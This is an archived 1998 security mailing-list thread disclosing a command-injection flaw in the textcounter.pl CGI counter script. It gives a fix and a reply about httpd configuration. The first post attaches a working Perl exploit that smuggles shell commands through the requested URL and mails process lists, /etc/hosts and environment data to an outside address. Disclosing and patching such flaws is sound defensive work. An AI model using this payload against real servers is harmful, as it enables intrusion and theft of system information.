Date:         Wed, 24 Jun 1998 08:51:11 +0300
From:         Doru Petrescu <pdoru@KAPPA.RO>
Subject:      textcounter.pl SECURITY HOLE

Hi,

   I've found a serious problem in textcounter.pl script that enable
everybody to execute commands on your system with the same rights as the
httpd daemon.
   Program was created by Matt Wright (mattw@worldwidemart.com) and
has a "Last Modified Date" at 5/10/96. You can find it at
http://www.worldwidemart.com/scripts/.

   The counter use the enviroment variable DOCUMENT_URI to
create/read/update a file where it keeps the hit count. There is NO test
for shell metacharacters, so you can easily put something evil, that will
make PERL to execute it ...
   This is the two lines responsible with the problem ...

   if (-e "$data_dir$count_page") {
      open(COUNT,"$data_dir$count_page");
    ....
   }

   Because of the test condition, the attack have to be repeated twice to
succeed. First time the condition is false and the tricky file gets
created, and the second time, the condition is true and our commands get
executed ... Nice isn't it ? :(

   The fix is very simple: add after line 91, another line that will make
sure that there is NO tricky characters in the filename.

$count_page = "$ENV{'DOCUMENT_URI'}";         # the original 91 line ....
$count_page =~ s/([^a-z0-9])/sprintf("%%%02X",$1)/ge;   # ADD THIS !!!!!


    If you want to make sure that your system is vulnerable or not, you
can use the small program that it's attached. No cracking please ...


Best regards,
------
Doru Petrescu
KappaNet - Software Engineer
E-mail: pdoru@kappa.ro

Exploit :

-- cut here --

#!/usr/bin/perl

$URL='http://dtp.kappa.ro/a/test.shtml';    # please _DO_ _modify_ this 
$EMAIL='pdoru@pop3.kappa.ro,root';   	    # please _DO_ _modify_ this


if ($ARGV[0]) {
   $CMD=$ARGV[0];
}else{
   $CMD="(ps ax;cd ..;cd ..;cd ..;cd etc;cat hosts;set)\|mail ${EMAIL} -sanothere_one";
}

$text="${URL}/;IFS=\8;${CMD};echo|";
$text =~ s/ /\$\{IFS\}/g;

#print "$text\n";

system({"wget"} "wget", $text, "-O/dev/null");
system({"wget"} "wget", $text, "-O/dev/null");
#system({"lynx"} "lynx", $text); 
#system({"lynx"} "lynx", $text);     # if you don't have "wget"
				  # you can try with "Lynx"

-- cut here --

----------------------------------------------------------------------------

Date:         Wed, 24 Jun 1998 03:35:57 -0400
From:         Rich Lafferty <lafferty@POBOX.COM>
Subject:      Re: textcounter.pl SECURITY HOLE

Quoting Doru Petrescu (pdoru@kappa.ro) from Wed, Jun 24, 1998 at 08:51:11AM +0300:
>              Hi,
>
>    I've found a serious problem in textcounter.pl script that enable
> everybody to execute commands on your system with the same rights as the
> httpd daemon.

Bah, that's what I get for writing things at 3:30 am.

Regarding my previous post:

Yes, this script's vulnerability allows execution of arbitrary commands.

Part about 'same rights as http daemon' still implies poor configuration
of httpd. Obviously, translate that to 'with the same rights as the
user running this poorly-written prefabricated script' for a properly-
configured httpd.

Use cgiwrap. Don't run scripts from untrusted sources. Don't take candy
from strangers. Breathe.

  -Rich

--
Rich Lafferty -----------+-------------------------------------------
Department of Sociology  | "Theory means you have ideas; ideology
McGill University        |  means ideas have you" -unknown anarchist
lafferty@pobox.com ------+-------------------------------------[mcq]-


